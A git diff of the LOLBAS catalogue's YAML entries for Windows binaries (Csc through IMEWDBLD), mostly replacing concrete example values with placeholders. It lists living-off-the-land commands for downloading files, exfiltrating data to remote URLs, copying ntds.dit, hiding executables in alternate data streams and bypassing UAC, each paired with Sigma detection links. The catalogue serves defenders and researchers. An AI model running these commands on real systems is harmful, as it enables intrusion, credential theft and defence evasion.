to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file. + - Command: csc -target:library {PATH:.cs} + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User @@ -25,8 +25,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 129672d..c5591a2 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -1,10 +1,10 @@ --- Name: Cscript.exe Description: Binary used to execute scripts in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cscript //e:vbscript c:\ads\file.txt:script.vbs + - Command: cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 7390b35..b618027 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -1,7 +1,7 @@ --- Name: CustomShellHost.exe Description: A host process that is used by custom shells when using Windows in Kiosk mode. -Author: 'Wietze Beukema' +Author: Wietze Beukema Created: 2021-11-14 Commands: - Command: CustomShellHost.exe diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index 2321e38..4712e4b 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -1,10 +1,10 @@ --- Name: DataSvcUtil.exe Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. -Author: 'Ialle Teixeira' +Author: Ialle Teixeira Created: 2020-12-01 Commands: - - Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + - Command: DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL} Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 5e51a01..ca470e6 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -4,7 +4,7 @@ Description: Windows binary used to configure lockscreen/desktop image Author: Gal Kristal Created: 2020-06-28 Commands: - - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr + - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr Description: Downloads the file and sets it as the computer's lockscreen Usecase: Download arbitrary files from a web server Category: Download @@ -13,8 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\desktopimgdownldr.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml diff --git a/yml/OSBinaries/DeviceCredentialDeployment.yml b/yml/OSBinaries/DeviceCredentialDeployment.yml index 019ea43..6579fe0 100644 --- a/yml/OSBinaries/DeviceCredentialDeployment.yml +++ b/yml/OSBinaries/DeviceCredentialDeployment.yml @@ -1,8 +1,8 @@ --- Name: DeviceCredentialDeployment.exe Description: Device Credential Deployment -Author: 'Elliot Killick' -Created: '2021-08-16' +Author: Elliot Killick +Created: 2021-08-16 Commands: - Command: DeviceCredentialDeployment Description: Grab the console window handle and set it to hidden diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index ab8ca26..f8df5a7 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -1,10 +1,10 @@ --- Name: Dfsvc.exe Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL} Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting Category: AWL Bypass @@ -19,8 +19,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index 832b996..d4de7e6 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -4,8 +4,8 @@ Description: Binary that package existing files into a cabinet (.cab) file Author: Tamir Yehuda Created: 2020-08-08 Commands: - - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab - Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. + - Command: diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab + Description: Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an Alternate Data Stream. Category: ADS Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. Tags: - Type: Compression - - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab - Description: Download and compress a remote file and store it in a cab file on local machine. + - Command: diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab} + Description: Download and compress a remote file and store it in a CAB file on local machine. Usecase: Download and compress into a cab file. Category: Download Privileges: User @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 Tags: - Type: Compression - - Command: diantz /f directives.ddf + - Command: diantz /f {PATH:.ddf} Description: Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification. Usecase: Bypass command-line based detections Category: Execute @@ -34,8 +34,6 @@ Commands: Full_Path: - Path: c:\windows\system32\diantz.exe - Path: c:\windows\syswow64\diantz.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index c54501f..46a84ad 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -1,10 +1,10 @@ --- Name: Diskshadow.exe Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: diskshadow.exe /s c:\test\diskshadow.txt + - Command: diskshadow.exe /s {PATH:.txt} Description: Execute commands using diskshadow.exe from a prepared diskshadow script. Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit Category: Dump @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows server Tags: - Execute: CMD - - Command: diskshadow> exec calc.exe + - Command: diskshadow> exec {PATH:.exe} Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures Category: Execute @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 613ce76..260fe20 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -1,10 +1,10 @@ --- Name: Dnscmd.exe Description: A command-line interface for managing DNS servers -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll + - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll} Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. Usecase: Remotely inject dll to dns server Category: Execute @@ -28,7 +28,6 @@ Resources: - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html Acknowledgement: - Person: Shay Ber - Handle: - Person: Dimitrios Slamaris Handle: '@dim0x69' - Person: Nikhil SamratAshok diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 378d7c2..31014eb 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -1,45 +1,45 @@ --- Name: Esentutl.exe Description: Binary for working with Microsoft Joint Engine Technology (JET) database -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o + - Command: esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o Description: Copies the source VBS file to the destination VBS file. Usecase: Copies files from A to B Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o + - Command: esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o + - Command: esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. Usecase: Extract hidden file within alternate data streams Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o + - Command: esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o + - Command: esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o Description: Copies the source EXE to the destination EXE file Usecase: Use to copy files from one unc path to another Category: Download Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit + - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit} Description: Copies a (locked) file using Volume Shadow Copy Usecase: Copy/extract a locked file such as the AD Database Category: Copy @@ -49,8 +49,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index d8beeea..56e4bde 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -1,7 +1,7 @@ --- Name: Eventvwr.exe Description: Displays Windows Event Logs in a GUI window. -Author: 'Jacob Gajek' +Author: Jacob Gajek Created: 2018-11-01 Commands: - Command: eventvwr.exe @@ -14,7 +14,7 @@ Commands: Tags: - Application: GUI - Execute: EXE - - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe + - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Category: UAC Bypass diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index 0bd732d..c6fa3f2 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -1,24 +1,24 @@ --- Name: Expand.exe Description: Binary that expands one or more compressed files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat + - Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat} Description: Copies source file to destination. Usecase: Use to copies the source file to the destination file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat + - Command: expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext} Description: Copies source file to destination. Usecase: Copies files from A to B Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat + - Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat Description: Copies source file to destination Alternate Data Stream (ADS) Usecase: Copies files from A to B Category: ADS diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 1c0e2ff..044c44c 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -4,8 +4,8 @@ Description: Binary used for managing files and system components within Windows Author: Jai Minton Created: 2020-06-24 Commands: - - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" - Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe + - Command: explorer.exe /root,"{PATH_ABSOLUTE:.exe}" + Description: Execute specified .exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Category: Execute Privileges: User @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: explorer.exe C:\Windows\System32\notepad.exe + - Command: explorer.exe {PATH_ABSOLUTE:.exe} Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Category: Execute diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index c75e30a..dfe25bb 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,11 +1,11 @@ --- Name: Extexport.exe Description: Load a DLL located in the c:\test folder with a specific name. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Extexport.exe c:\test foo bar - Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll + - Command: Extexport.exe {PATH_ABSOLUTE:folder} foo bar + Description: Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll. Usecase: Execute dll file Category: Execute Privileges: User diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 251118b..68b94da 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -1,10 +1,10 @@ --- Name: Extrac32.exe Description: Extract to ADS, copy or overwrite a file with Extrac32.exe -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe + - Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe + - Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS @@ -22,15 +22,15 @@ Commands: OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt + - Command: extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE} Description: Copy the source file to the destination file and overwrite it. Usecase: Download file from UNC/WEBDav Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe - Description: Command for copying calc.exe to another folder + - Command: extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe} + Description: Command for copying file from one folder to another Usecase: Copy file Category: Copy Privileges: User @@ -39,8 +39,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\extrac32.exe - Path: C:\Windows\SysWOW64\extrac32.exe -Code_Sample: - - Code: Detection: - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 31c3af5..739ec2b 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,17 +1,17 @@ --- Name: Findstr.exe Description: Write to ADS, discover, or download files with Findstr.exe -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe - Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. + - Command: findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe + Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file. Usecase: Add a file to an alternate data stream to hide from defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe + - Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures Category: ADS @@ -25,7 +25,7 @@ Commands: Privileges: User MitreID: T1552.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe + - Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe} Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file. Usecase: Download/Copy file from webdav server Category: Download @@ -35,8 +35,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml Resources: diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index a236872..0c1968e 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -1,11 +1,11 @@ --- Name: Forfiles.exe Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe - Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. + - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{CMD}" + Description: Executes specified command since there is a match for notepad.exe in the c:\windows\System32 folder. Usecase: Use forfiles to start a new process to evade defensive counter measures Category: Execute Privileges: User @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" + - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{PATH_ABSOLUTE}:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream Category: ADS @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml Resources: diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index e4b38ed..28593e4 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -1,10 +1,10 @@ --- Name: Fsutil.exe Description: File System Utility -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-08-16 Commands: - - Command: fsutil.exe file setZeroData offset=0 length=9999999999 C:\Windows\Temp\payload.dll + - Command: fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE} Description: Zero out a file Usecase: Can be used to forensically erase a file Category: Tamper diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 6b4828b..938e2ce 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -1,10 +1,10 @@ --- Name: Ftp.exe Description: A binary designed for connecting to FTP servers -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-12-10 Commands: - - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt + - Command: echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt Description: Executes the commands you put inside the text file. Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand Category: Execute @@ -23,8 +23,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml - IOC: cmd /c as child process of ftp.exe diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 3ac6adc..1c5f0b0 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -1,7 +1,7 @@ --- Name: Gpscript.exe Description: Used by group policy to process scripts -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Gpscript /logon @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml - IOC: Scripts added in local group policy diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 27af482..bb1798e 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -1,11 +1,11 @@ --- Name: Hh.exe Description: Binary used for processing chm files in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: HH.exe http://some.url/script.ps1 - Description: Open the target PowerShell script with HTML Help. + - Command: HH.exe {REMOTEURL:.bat} + Description: Open the target batch script with HTML Help. Usecase: Download files from url Category: Download Privileges: User @@ -14,8 +14,8 @@ Commands: Tags: - Execute: EXE - Application: GUI - - Command: HH.exe c:\windows\system32\calc.exe - Description: Executes calc.exe with HTML Help. + - Command: HH.exe {PATH_ABSOLUTE:.exe} + Description: Executes specified executable with HTML Help. Usecase: Execute process with HH.exe Category: Execute Privileges: User @@ -24,8 +24,8 @@ Commands: Tags: - Execute: EXE - Application: GUI - - Command: HH.exe http://some.url/payload.chm - Description: Executes a remote payload.chm file which can contain commands. + - Command: HH.exe {REMOTEURL:.chm} + Description: Executes a remote .chm file which can contain commands. Usecase: Execute commands with HH.exe Category: Execute Privileges: User @@ -38,8 +38,6 @@ Commands: Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 7803476..5dd0756 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -1,10 +1,10 @@ --- Name: IMEWDBLD.exe Description: Microsoft IME Open Extended Dictionary Module -Author: 'Wade Hickey' +Author: Wade Hickey Created: 2020-03-05 Commands: - - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL} Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache. Usecase: Download file from Internet Category: Download diff --git 